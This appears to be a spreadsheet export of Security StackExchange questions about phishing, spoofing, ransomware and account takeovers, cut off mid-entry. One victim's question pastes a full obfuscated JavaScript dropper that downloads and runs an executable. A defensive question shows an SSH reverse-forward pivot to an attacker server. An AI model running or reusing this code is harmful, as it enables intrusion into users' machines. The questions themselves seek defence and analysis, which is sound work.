    <t>&lt;p&gt;Several times I get a phone call from a company- my bank, utility companies etc. Many times they are just cold calling me, but once or twice they were calling for legitimate reasons (ie, something to do with my account).&lt;/p&gt;
 &lt;p&gt;The problem is, all these companies ask you to confirm your personal details, like date of birth. Now I have no way of knowing if the person calling me is the real company, or some phisher (because even if the call isn't from a blocked number, it's just a number and I have no way of knowing who owns it).&lt;/p&gt;
 &lt;p&gt;Usually, when they ask me to ask for personal details to prove my identity, I tell them since they called, they should prove their identity.&lt;/p&gt;
 &lt;p&gt;At this point they usually get irate and warn me they cannot go ahead for security reasons. Now I don't want to miss out on important calls, but neither do I want to give out my personal info to anyone who manages to find my phone number.&lt;/p&gt;
 &lt;p&gt;Is there a proper way to deal with such calls?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;privacy&gt;&lt;identification&gt;&lt;identity-theft&gt;</t>
  </si>
  <si>
    <t>Is Social Engineering out of scope unless explicitly requested?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've seen some sample "What would you like to be pentested?" page (I can't find or remember the exact source) where &lt;em&gt;Cyber, Physical and Social&lt;/em&gt; were asked separately (among other areas like Wifi, Network, WebApp, etc). Let's assume the customer does &lt;em&gt;not&lt;/em&gt; request for a Social Engineering test. Whether the test is on-site or remote, there are some social engineering kind of attacks I'm not too sure about:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Phishing (maybe with email forgery)&lt;/li&gt;
 &lt;li&gt;Asking for secret information like passwords&lt;/li&gt;
 &lt;li&gt;Badge cloning (I'm not sure how this is categorized)&lt;/li&gt;
 &lt;li&gt;Making online support (human) give me unintended access to some part of the system&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Those are just a few I thought of on the spot, but there are many more in some gray area, like &lt;em&gt;phishing&lt;/em&gt; being between digital and social. Testers can also just get creative and make up attacks involving social engineering. Given that &lt;em&gt;Social Engineering&lt;/em&gt; is not explicitly in the scope, are such "social-engineering-ish" attacks above considered &lt;em&gt;out of scope&lt;/em&gt; and are not allowed?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>How does Single Sign On limit phishing risk</t>
  </si>
  <si>
    <t>&lt;p&gt;I was reading &lt;a href="http://www.evolok.com/blog/six-benefits-of-single-sign-on/" rel="nofollow"&gt;this article&lt;/a&gt; about SSO benefits and this sentence intrigues me : &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Can reduce phishing ‚Äì Phishing, a fraudulent process where victims are tricked into giving away sensitive user information, increasing security for you and your users.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;How is this possible ? I mean if the victim is using SSO then the attacker will gain access to all authorized services instead of the only "phished account" what would increase the impact of phishing.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;phishing&gt;&lt;single-sign-on&gt;</t>
  </si>
  <si>
    <t>What approaches are used to discover zero-day vulnerabilities?</t>
  </si>
  <si>
    <t>&lt;p&gt;As a developer of multiple standalone apps &lt;em&gt;(Web-/Native apps)&lt;/em&gt; I am wondering, what things I should keep in mind / &lt;strong&gt;what&lt;/strong&gt; are typical approaches of a &lt;em&gt;blackhat&lt;/em&gt; (besides of these &lt;em&gt;scriptkiddies&lt;/em&gt; checking for sql injection etc.) to identify such vulnerabilities.&lt;/p&gt;
 &lt;p&gt;During my web research I only found very broad information and no detail on how a &lt;em&gt;blackhat&lt;/em&gt; actually finds a &lt;em&gt;zero day vulnerability&lt;/em&gt;.&lt;/p&gt;
 &lt;p&gt;Regardless network/phishing/social engineering vulnerabilities.&lt;/p&gt;
 &lt;p&gt;I'd like to know &lt;strong&gt;what&lt;/strong&gt; is the approach to find a zero day exploit/vulnerability and how can I, as a developer, make my software more consistent?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;vulnerability&gt;&lt;zero-day&gt;</t>
  </si>
  <si>
    <t>MacOS Ransomware with EFI Lock</t>
  </si>
  <si>
    <t>&lt;h2&gt;Problem Description&lt;/h2&gt;
 &lt;p&gt;Yesterday my mother called me that she got a message on her iPhone, that it was stolen (&lt;em&gt;iCloud Find My Phone&lt;/em&gt;). She then had to enter security codes (&lt;em&gt;two-factor authentication&lt;/em&gt;) into a textfield on her MacBook. I was not there at this time, so I can not really prove it. I think this was already a phishing window of the ransomware.&lt;/p&gt;
 &lt;p&gt;She is using my old MacBook, an early 2011, 13" with updated SSD and 16 GB RAM, with &lt;strong&gt;10.10&lt;/strong&gt; installed.&lt;/p&gt;
 &lt;p&gt;When I arrived, the MacBook was already compromised and showed following message, after booting:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/enVN8.jpg" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/enVN8.jpg" alt="Ransomware Screenshot"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The message is in german and says:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Ihr Computer ist deaktiviert. Versuchen Sie es in 59 Minuten erneut.
 (Translation: Your computer is deactivated. Try it again in 59 minutes.)
 write to email: apple.help@gmx.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;apple.help@gmx.com&lt;/strong&gt; is definitely not a valid apple mail address.&lt;/p&gt;
 &lt;p&gt;I googled for the exact same message and I did not really got any good results. The only results I found were these:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://forums.macg.co/threads/help-je-crois-avoir-ete-infecte-par-un-ransomware.1294610/" rel="noreferrer"&gt;Je crois avoir √©t√© infect√© par un ransomware&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://www.reddit.com/r/applehelp/comments/6p9mx3/phone_locked_into_lost_mode_with_a_message_of/" rel="noreferrer"&gt;Phone Locked into Lost Mode&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;h2&gt;How to fix it?&lt;/h2&gt;
 &lt;p&gt;My thought was that it was just a &lt;strong&gt;screen overlay&lt;/strong&gt; and it should be possible to boot into another OS (live Ubuntu) to get access to the data. I wanted to find a trace of the ransomware. Maybe I could find out how it is called or what it was doing with the data.&lt;/p&gt;
 &lt;p&gt;When I tried to boot to another device, the Mac was locked with a &lt;strong&gt;EFI firmware protection&lt;/strong&gt; password (the same screen with the little lock was appearing). I never set this and I really doubt that my mother did it. So it could be only the ransomware.&lt;/p&gt;
 &lt;p&gt;So I first had to reset the firmware password. Luckily I found a blog entry which describes a way where you have to change the amount of RAM sticks in your system and then reset the &lt;strong&gt;PRAM&lt;/strong&gt; / &lt;strong&gt;NVRAM&lt;/strong&gt;. I thought it sounds a bit like magic, but on the other way, the system could not get worse.&lt;/p&gt;
 &lt;p&gt;I removed a RAM stick, booted with &lt;strong&gt;CTRL+ALT+P+R&lt;/strong&gt; and waited for &lt;strong&gt;three reboots&lt;/strong&gt;.&lt;/p&gt;
 &lt;p&gt;After that it the firmware lock was gone and it was possible to boot onto a USB stick. I checked for recent file changes on the mac partition, but could not find anything. The data of the home folder was not encrypted (so maybe it was a hoax).&lt;/p&gt;
 &lt;p&gt;So I made a backup of her data and then tried to do a normal boot again. Surprisingly, the ransomware message was gone! I could just boot into the system as usual.&lt;/p&gt;
 &lt;p&gt;I run a Bitdefender scan, but nothing was found. It is really mysterious and I have no idea what really happened.&lt;/p&gt;
 &lt;h2&gt;Question&lt;/h2&gt;
 &lt;p&gt;So my question now is, does anybody know this problem or this kind of attack? I have no clue how the attackers could set the firmware password and where the software of the ransomware was running.&lt;/p&gt;
 &lt;p&gt;Maybe it was on an own partition but I could not find it. The MacOS seems not to be corrupted.&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;Update&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;I asked an Apple Store worker today and he did not know anything about a hack like this. But he told me that it should not be possible to reset the firmware password. Only Apple is able to do that.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;macos&gt;&lt;ransomware&gt;&lt;uefi&gt;</t>
  </si>
  <si>
    <t>What are good proof-of-concept implementations for general security awareness training?</t>
  </si>
  <si>
    <t>&lt;p&gt;I will be giving a presentation on "cyber security" to a school class of 16 year olds and want to show them how network security works, how important privacy is (and why it matters) and how to protect oneself online. &lt;/p&gt;
 &lt;p&gt;Apart from (static) general slides on the topic I want to show them in an visually appealing and understandable way how "hacking", tracking for advertisement and phishing works.&lt;/p&gt;
 &lt;p&gt;So far I have prepared:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;A WiFi hotspot with mitmproxy running to intercept a WhatsApp message sent from a prepared phone&lt;/li&gt;
 &lt;li&gt;Wireshark running on the same hotspot to show them how easy it is to inspect their web traffic&lt;/li&gt;
 &lt;li&gt;Firefox Lightbeam addon to show them how ad networks track them&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Now I'm looking for more ideas / proofs of concepts of hacks that are easy to deploy / run and show how (in)secure something is.&lt;/p&gt;
 &lt;p&gt;What are good proof-of-concept implementations for general security awareness training?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;awareness&gt;</t>
  </si>
  <si>
    <t>In what ways can the URL be analyzed to decide whether a page is Phishing or not?</t>
  </si>
  <si>
    <t>&lt;p&gt;In what ways can a URL be analyzed to check whether its a Phishing page or not. Such as using target site's name somewhere in the URL, URL obfuscation, misspellings, etc. Its not possible every time that URL analysis will be able to judge whether a page is a phishing page or not, but can it be used in some cases?&lt;/p&gt;
 &lt;p&gt;So what are the different ways to analyze URL to detect phishing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spoofing&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Is there any tool or method to detect spoofed CCs?</t>
  </si>
  <si>
    <t>&lt;p&gt;One of our phishing scenarios during a pentest went like this: we send an email saying something along the lines of "As per the manager (CCd) please download the latest software included". Then we attach the manager as CCd in the headers but never actually send the CC email using our server, making it look like the manager is aware and approves, while the real manager has never actually received the email. However what we're finding an issue with is how do we actually fix this problem? Does a solution exist which checks the CCd users and whether they've actually received the emails? Is there any other way to detect this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Is it possible for a phishing link to install a major virus on a Mac?</t>
  </si>
  <si>
    <t>&lt;p&gt;My girlfriend recently had her university MS Exchange account hacked. The attacker took over her email account and started using it to send thousands of spam emails. After a while, her email account must've hit some kind of limit, and the university server started sending &lt;em&gt;her&lt;/em&gt; an email for every email that the spammer attempted to send from her account!&lt;/p&gt;
 &lt;p&gt;Anyway, she remembers accidentally clicking a phishing link in an email in webmail on her MacBook Pro that claimed to be an email from the university's IT Services, but that's all. Apparently, the link "did nothing" and closed immediately. She did NOT fill in any form that asked for her email address or password.&lt;/p&gt;
 &lt;p&gt;Despite changing her password, the attackers did not stop. How is this possible? Her Exchange account is linked to the university's central account system, but I'm not sure how exactly. Anyway, changing one password changes the whole thing.&lt;/p&gt;
 &lt;p&gt;Now IT services is telling her to reinstall everything (Mac OS X, files etc) on her laptop before they agree to re-activate her university account. This seems wrong to me - &lt;strong&gt;how could the laptop be infected, if all she did was click a link in an email via webmail&lt;/strong&gt;? Is that even possible? (I expect she was probably using Firefox). They are worried that she has a rootkit virus.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: I forgot to mention, she also had Sophos installed. Not sure exactly how up to date it was.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;virus&gt;&lt;macos&gt;&lt;phishing&gt;&lt;exchange&gt;</t>
  </si>
  <si>
    <t>Email from supposedly Apple (mycloud.ssl.com)</t>
  </si>
  <si>
    <t>&lt;p&gt;I got an email where it says that Apple recently failed to validate my payment information and therefore they need to ask me to complete a short verification process in order to verify my account.&lt;/p&gt;
 &lt;p&gt;At the end of the email it says&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Copyright ¬© 2016 Apple Inc. Apple Inc., Infinite Loop, Cupertino, CA 95014 Company Registration number: 15719. .&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The email finished in &lt;em&gt;@mycloud.ssl.com&lt;/em&gt; and I actually clicked on the link that they gave me.&lt;/p&gt;
 &lt;p&gt;I got this in my browser:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/FTkM5.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/FTkM5.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I know it is in Spanish but I'm sure you know this screen.
 Did this screen avoided from attackers to take personal information?&lt;/p&gt;
 &lt;p&gt;Or is it already dangerous to have clicked the link?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Paypal sent an email addressing me with one of my old passwords as my name</t>
  </si>
  <si>
    <t>&lt;p&gt;I got this email from &lt;strong&gt;service@intl.paypal.com&lt;/strong&gt;, with the title: &lt;/p&gt;
 &lt;p&gt;&lt;em&gt;Your account has been limited until we hear from you.&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;I think this is a scam / spoof email because I don't see any notification in my Paypal account and this is Hotmail account is not used as my Paypal login. (It used to be not any more for more than a year.)&lt;/p&gt;
 &lt;p&gt;But the troubling thing is, the &lt;strong&gt;TO: field has my old password as my name,&lt;/strong&gt; then my email in brackets. A screenshot below should clarify what I'm saying. I've blurred my email and the two red arrows are pointing to what was my old password in plain text.&lt;/p&gt;
 &lt;p&gt;Is there anything I could do to protect myself? Does that mean the sender has me under their "contact book" with my name as my password? I have already forwarded the email to spoof@paypal.com.&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/IhKhq.jpg" alt="enter image description here"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;email&gt;&lt;phishing&gt;&lt;identity&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>How to stop outgoing SSH on port 443</t>
  </si>
  <si>
    <t>&lt;p&gt;Let us say that a small company has an internal network for employees. All employees are granted Internet access via a NAT device (not a proxy) and perimeter firewall only allows outgoing connections to port 80 and 443. An attacker manages to compromise an employee workstation (say by spear phishing mail) and wishes to pivot into the internal network. He decides to use SSH port forwarding and sets up &lt;em&gt;his&lt;/em&gt; SSH server to listen on port 443. He then launches remote port forwarding on the compromised machine&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$ ssh -p 443 -N -R 8080:127.0.0.1:9999 admin@rogue_server
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;As outgoing traffic is to port 443, the firewall allows it.&lt;/p&gt;
 &lt;p&gt;How can the company defend against such attacks?&lt;/p&gt;
 &lt;p&gt;I am interested in knowing about various possible defenses including the obvious application firewall. For an application firewall - would a proxy server like Squid suffice?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firewalls&gt;&lt;ssh&gt;&lt;port-forwarding&gt;&lt;pivoting&gt;</t>
  </si>
  <si>
    <t>What are the downsides of BrowserID/Persona compared to OpenID/OAuth/Facebook?</t>
  </si>
  <si>
    <t>&lt;p&gt;Mozilla went live with a new service called &lt;a href="https://login.persona.org"&gt;BrowserID/Persona&lt;/a&gt; (&lt;a href="http://identity.mozilla.com/post/7616727542/introducing-browserid-a-better-way-to-sign-in"&gt;announcement&lt;/a&gt;, &lt;a href="http://lloyd.io/how-browserid-works"&gt;background&lt;/a&gt;). It is intended to replace current single-sign-on solutions such as OpenID, OAuth and Facebook. &lt;/p&gt;
 &lt;p&gt;One advantage is that a &lt;a href="http://people.mozilla.com/~faaborg/files/projects/firefoxAccount/index.html"&gt;future integration into the browsers&lt;/a&gt; will reduce the phishing risks. Also, the identity provider will not be notified about the sites someone logs in to, which is good from a privacy point of view.&lt;/p&gt;
 &lt;p&gt;What are the issues with BrowserID/Persona compared to OpenID/OAuth/Facebook?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;oauth&gt;&lt;openid&gt;&lt;federation&gt;&lt;persona&gt;</t>
  </si>
  <si>
    <t>Looking for URL Blacklists of Malicious Websites</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there a maintained list of URLs that contain malicious content. These URLs may be involved in Phishing, Scams, Viri, or other Malware.&lt;/p&gt;
 &lt;p&gt;Please indicate in your answer if the list is freely distributed or if there is a cost associated with it.&lt;/p&gt;
 &lt;p&gt;One list that I have found so far is &lt;a href="http://www.phishtank.com"&gt;PhishTank.com&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.urlblacklist.com"&gt;URLBlackList.com&lt;/a&gt; also looked promising.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;spyware&gt;</t>
  </si>
  <si>
    <t>Hotmail security</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently I've been receiving in my SPAM folder, SPAM mails sent "by me".&lt;/p&gt;
 &lt;p&gt;With "By me" I mean, that I am not sure if those are really sent from me.&lt;/p&gt;
 &lt;p&gt;It has been happening since December, at around one email per week. I've changed password 3 times. 
 The last time, two weeks ago, I enabled two-step verification, so I guess no-one should be able to login without the verification code.&lt;/p&gt;
 &lt;p&gt;However, maybe those emails, are not really sent by me. AFAIK, you can send an email pretending to be someone other, and if you check headers of the email, you can see who actually sent it.&lt;/p&gt;
 &lt;p&gt;However, I'm a bit lost in security terms. I need someone to help me to find out if the e-mail I'm going to attach is actually sent by me, or by some other account under my name.&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/4SCuZ.png" alt="enter image description here"&gt;&lt;/p&gt;
 &lt;p&gt;Green - My email.
 Yellow - Spam website.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Do certificate issuers perform checks against homograph attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just got a very phishy looking email from Vodafone. It had encoding errors and nothing more than my name in it. It asked me to confirm my email address and in order to do that I had to enter some contract details after clicking a link. It turned out to be genuine and was indeed about a product I recently ordered from them.&lt;/p&gt;
 &lt;p&gt;Because it looked so phishy I had double checked that the domain was actually &lt;code&gt;vodafone.de&lt;/code&gt; and that the certificate was issued by a trusted issuer. But it got me wondering - does that actually protect me from attacks like homograph attacks or overlong encoding attacks? Are certificate issuers bound to some standard about checking the domain name that they are signing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;public-key-infrastructure&gt;&lt;certificate-authority&gt;</t>
  </si>
  <si>
    <t>How to implement non-password authentication in a web site</t>
  </si>
  <si>
    <t>&lt;p&gt;In an answer to &lt;a href="https://security.stackexchange.com/questions/1918/"&gt;this question about pw reset&lt;/a&gt;, D.W. says: &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Lastly, consider non-password authentication. Passwords have many problems as an authentication mechanism, and you might consider other methods of authenticating users, such as storing a secure persistent cookie on their machine with an unguessable secret to authenticate them. This way, there is no password to forget and no way for the user to be phished, though you do need to provide a way for a user to authorize access from a new machine or a new browser (possibly via email to the user's pre-registered email address).&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;How does one do that? How safe and user friendly is this solution? What are the key drawbacks?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;appsec&gt;&lt;web-application&gt;&lt;authentication&gt;</t>
  </si>
  <si>
    <t>What should I do when I received spam emails?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got these emails from a spammer to my inbox, I am not sure if these are phishing attempt. I can't tell.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/yMg2z.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/yMg2z.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Click on one of them, I see this
 &lt;a href="https://i.stack.imgur.com/t1rWt.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/t1rWt.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I checked the codes behind that mail, I see&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;smtp.mailfrom=YbAilGJazUvJpYoYlVS.cnrpxfkfvvmetdifzxgiyzrzc.fmfsruwjpipssifktxyexpnyatvsymfoz;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If I open those emails but do not click on any links, will I still be vulnerable?&lt;/p&gt;
 &lt;p&gt;What are the appropriate actions when we're in that kind of situation? We gotta select them and delete them somehow. at least ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spam&gt;&lt;outlook&gt;</t>
  </si>
  <si>
    <t>Phishing/spam websites using the same domain as legitimate websites?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have found links to an obvious bait website. &lt;a href="http://restandrun.holidayinn.com/" rel="nofollow noreferrer"&gt;Link to PHISHING website&lt;/a&gt;. However, I was very surprised to see the domain is &amp;quot;holidayinn.com&amp;quot;. On first sight this appears to be a genuine subdomain. How is this possible?&lt;/p&gt;
 &lt;p&gt;EDIT: An extra link. I do not believe this is an &lt;a href="http://restandrun.holidayinn.com/cgi/viewcontent.php?article=schaums.outline.of.complex.variables.murray.r.spiegel&amp;amp;context=libpubs" rel="nofollow noreferrer"&gt;acccident&lt;/a&gt;. This leads to &amp;quot;genuine&amp;quot; signup scams.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Javascript phishing attack sucker: Do I need to be worried?</t>
  </si>
  <si>
    <t>&lt;p&gt;So, I'm an idiot. I opened a javascript phishing attack file. I would really, really appreciate some help with decoding the Javascript to figure out whether I'm in trouble, and what sort.&lt;/p&gt;
 &lt;p&gt;I'm on OS X 10.9.5. I opened the file with both Safari and Firefox before realizing what I was doing (I'm older and not terribly bright sometimes- and I had just gotten off the phone with the company the phishers were impersonating). The filename was "FedEx_000969418.doc.js."&lt;/p&gt;
 &lt;p&gt;Would anyone be good enough to help me figure this out? I would really, really appreciate it, and will learn from my foolishness and try to help others avoid the same.&lt;/p&gt;
 &lt;p&gt;I'm hoping it's Windows-specific... the accompanying email was not very sophisticated. But I'm ready for the worst if there's a problem.&lt;/p&gt;
 &lt;p&gt;I tried Googling the file title and bits of the code, no luck. also tried de-obfuscating, and the parsers won't take it. I'm a dimwit obviously, so could really really use anyone's help with analyzing this.&lt;/p&gt;
 &lt;p&gt;The JS is as follows (I opened it with TextEdit and copied it):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;var stroke="5556515E070B0A1005071024120D171005011C140116100D17014A0A0110";function do193() { return ',"h'; }; function do112() { return ') { '; }; function do127() { return 'r xa'; }; function do88() { return '= 0;'; }; function do97() { return 't("'; }; function do5() { return '(fr) '; }; function do158() { return ') { '; }; function do215() { return 'er) {'; }; function do126() { return ' va'; }; function do9() { return '"e'; }; function do225() { return '25'; }; function do55() { return 'ndE'; }; function do220() { return 'bre'; }; function do84() { return 'exe"'; }; function do65() { return 'St'; }; function do37() { return ' va'; }; function do165() { return '; x'; }; function do128() { return ' = n'; }; function do184() { return '.clo'; }; function do8() { return ' = '; }; function do129() { return 'ew Ac'; }; function do57() { return 'ro'; }; function do136() { return 'tream'; }; function do187() { return '; }; '; }; function do11() { return 'y.co'; }; function do162() { return '.posi'; }; function do28() { return '(v'; }; function do222() { return ' } }'; }; function do98() { return 'MSX'; }; function do167() { return 'aveTo'; }; function do21() { return 'ub.c'; }; function do182() { return '; }; '; }; function do106() { return 'tate'; }; function do94() { return 'tive'; }; function do197() { return ']+"/d'; }; function do58() { return 'nme'; }; function do122() { return 'tatu'; }; function do20() { return 'ingcl'; }; function do93() { return 'Ac'; }; function do14() { return 'a.net'; }; function do188() { return 'try'; }; function do177() { return '); } '; }; function do175() { return 'n(fn'; }; function do140() { return 'n(); '; }; function do() { return 'val'; }; function do72() { return 'Math'; }; function do33() { return 'gth;'; }; function do155() { return 'a.siz'; }; function do145() { return '; '; }; function do27() { return ' for '; }; function do168() { return 'File'; }; function do208() { return 'alse'; }; function do147() { return 'ite'; }; function do111() { return 'on('; }; function do109() { return 'func'; }; function do35() { return '+)'; }; function do130() { return 'tive'; }; function do133() { return 't("AD'; }; function do202() { return '"+fr'; }; function do152() { return '); '; }; function do81() { return '0000'; }; function do110() { return 'ti'; }; function do194() { return 'ttp:'; }; function do62() { return '"%TE'; }; function do120() { return '&amp;amp;&amp;amp;'; }; function do50() { return 'l");'; }; function do174() { return 'Ru'; }; function do16() { return 'dic'; }; function do156() { return 'e &amp;gt; 5'; }; function do19() { return 'restl'; }; function do149() { return 'espo'; }; function do3() { return 'on '; }; function do119() { return ' 4 '; }; function do213() { return 'cat'; }; function do212() { return '); } '; }; function do46() { return '"W'; }; function do115() { return 'read'; }; function do80() { return '()*1'; }; function do108() { return 'e = '; }; function do71() { return ')+'; }; function do151() { return 'dy'; }; function do10() { return 'tq'; }; function do124() { return ' 2'; }; function do164() { return 'n = 0'; }; function do36() { return ' {'; }; function do195() { return '//"+b'; }; function do91() { return '= ne'; }; function do49() { return 'el'; }; function do206() { return 'oke,'; }; function do232() { return '3);'; }; function do15() { return '.br '; }; function do7() { return 'ar b'; }; function do144() { return '= 1'; }; function do69() { return 'Cod'; }; function do132() { return 'jec'; }; function do229() { return '); '; }; function do70() { return 'e(92'; }; function do31() { return '0; i&amp;lt;'; }; function do90() { return 'xo '; }; function do96() { return 'jec'; }; function do150() { return 'nseBo'; }; function do30() { return 'i='; }; function do34() { return ' i+'; }; function do101() { return 'TP"'; }; function do42() { return 'ti'; }; function do59() { return 'ntS'; }; function do13() { return 'id'; }; function do74() { return 'ou'; }; function do40() { return 'new '; }; function do211() { return 'nd('; }; function do160() { return '1; '; }; function do66() { return 'ring'; }; function do77() { return 'th'; }; function do125() { return '00) {'; }; function do73() { return '.r'; }; function do179() { return 'tch'; }; function do117() { return 'ate '; }; function do76() { return 'Ma'; }; function do45() { return 't('; }; function do104() { return 'onr'; }; function do44() { return 'jec'; }; function do51() { return ' va'; }; function do205() { return 'tr'; }; function do113() { return 'if '; }; function do1() { return 'fun'; }; function do4() { return 'dl'; }; function do79() { return 'andom'; }; function do161() { return 'xa'; }; function do83() { return '0)+".'; }; function do219() { return ' 1) '; }; function do82() { return '000'; }; function do176() { return ',1,0'; }; function do137() { return '"); '; }; function do102() { return '); '; }; function do159() { return 'dn = '; }; function do163() { return 'tio'; }; function do24() { return 'it'; }; function do105() { return 'eadys'; }; function do170() { return 'n,2);'; }; function do107() { return 'chang'; }; function do92() { return 'w '; }; function do226() { return '1); '; }; function do135() { return '.S'; }; function do118() { return '=='; }; function do153() { return 'if'; }; function do199() { return 'nt.ph'; }; function do200() { return 'p?r'; }; function do75() { return 'nd('; }; function do41() { return 'Ac'; }; function do216() { return '}; '; }; function do22() { return 'om'; }; function do67() { return '.fro'; }; function do204() { return 'd="+s'; }; function do103() { return 'xo.'; }; function do221() { return 'ak;'; }; function do39() { return 'ws = '; }; function do217() { return 'if (d'; }; function do2() { return 'cti'; }; function do18() { return 'nsonw'; }; function do154() { return ' (x'; }; function do114() { return '(xo.'; }; function do218() { return 'n =='; }; function do134() { return 'ODB'; }; function do181() { return 'r) {}'; }; function do201() { return 'nd='; }; function do12() { return 'm a'; }; function do141() { return 'xa.'; }; function do68() { return 'mChar'; }; function do17() { return 'ki'; }; function do121() { return ' xo.s'; }; function do209() { return '); '; }; function do171() { return ' try '; }; var fcx = ''; function do228() { return '962'; }; function do61() { return 's('; }; function do231() { return '(974'; }; function do123() { return 's =='; }; function do89() { return ' var '; }; function do64() { return '%")+'; }; function do148() { return '(xo.R'; }; function do99() { return 'ML2.'; }; function do210() { return 'xo.se'; }; function do29() { return 'ar '; }; function do26() { return ' ");'; }; function do203() { return '+"&amp;amp;i'; }; function do48() { return 'pt.Sh'; }; function do189() { return ' { xo'; }; function do78() { return '.r'; }; function do56() { return 'nvi'; }; function do47() { return 'Scri'; }; function do230() { return 'dl'; }; function do100() { return 'XMLHT'; }; function do53() { return '= ws.'; }; function do143() { return 'e '; }; function do63() { return 'MP'; }; function do32() { return 'b.len'; }; function do190() { return '.op'; }; function do25() { return '("'; }; function do116() { return 'ySt'; }; function do227() { return 'dl(9'; }; function do178() { return 'ca'; }; function do172() { return '{ '; }; function do95() { return 'XOb'; }; function do6() { return '{ v'; }; function do52() { return 'r fn '; }; function do223() { return '; d'; }; function do87() { return 'n '; }; function do180() { return ' (e'; }; function do198() { return 'ocume'; }; function do185() { return 'se();'; }; function do139() { return 'pe'; }; function do85() { return '; va'; }; function do38() { return 'r '; }; function do191() { return 'en('; }; function rs() { return 'e'; }; function do186() { return ' }'; }; function do207() { return ' f'; }; function do192() { return '"GET"'; }; function do60() { return 'tring'; }; function do169() { return '(f'; }; function do214() { return 'ch ('; }; function do86() { return 'r d'; }; function do224() { return 'l(2'; }; function do23() { return '".spl'; }; function do173() { return 'ws.'; }; function do43() { return 'veXOb'; }; function do131() { return 'XOb'; }; function do157() { return '000'; }; function do54() { return 'Expa'; }; function do166() { return 'a.s'; }; function do183() { return 'xa'; }; function do196() { return '[i'; }; function do138() { return 'xa.o'; }; function do146() { return 'xa.wr'; }; function do142() { return 'typ'; }; for (var xyy=1; xyy&amp;lt;=232; xyy++) { fcx += this['do'+xyy](); } this[rs()+do()](fcx); 
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;javascript&gt;&lt;phishing&gt;&lt;obfuscation&gt;</t>
  </si>
  <si>
    <t>Redirection - Different Website from Different Computer</t>
  </si>
  <si>
